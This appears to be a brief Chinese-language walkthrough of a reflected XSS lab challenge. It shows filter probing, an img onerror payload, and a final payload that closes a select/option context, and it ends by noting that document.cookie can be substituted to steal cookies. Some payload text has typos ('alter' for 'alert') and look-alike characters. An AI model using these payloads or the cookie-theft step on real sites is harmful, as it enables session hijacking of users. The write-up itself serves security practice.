老办法 先在框内随便输入东西,比如223123之类的,也在URL显示
试试<script>alter(1)</script>,发现没反应
说明屏蔽了<script>之类的,试试<,没屏蔽,在URL显示了,再试试<script,没反应,说明屏蔽了
使用 <img src=1 οnerrοr=alter(1)>, 有显示 但是没被执行
打开开发人员工具
可以看到我们输入的代码 但是没被执行
观察发现没有形成闭环
因此 添加<和</option>
最终结果为 ><select></option><img src=1 οnerrοr=alter(1)>
执行后弹窗1 结束
获取cookie只需要将1改为document.cookie即可